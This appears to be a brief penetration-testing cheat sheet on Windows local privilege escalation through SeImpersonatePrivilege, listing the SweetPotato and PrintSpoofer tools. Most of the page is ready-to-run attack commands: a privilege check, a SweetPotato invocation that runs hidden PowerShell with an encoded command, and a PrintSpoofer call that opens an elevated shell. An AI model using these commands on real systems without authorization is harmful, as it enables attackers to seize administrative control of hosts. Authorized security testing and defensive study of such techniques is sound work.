SeImpersonatePrivilege
Potatoes
whoami /privSweet Potato
# Exploiting a host with SweetPotato
.\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc <BASE64_CMD>"PrintSpoofer
# Verify that the Print Spooler service is running
Get-Service Spooler
# Run the PrintSpoofer executable to escalate privileges
.\PrintSpoofer.exe -i -c powershellReferences
Last updated
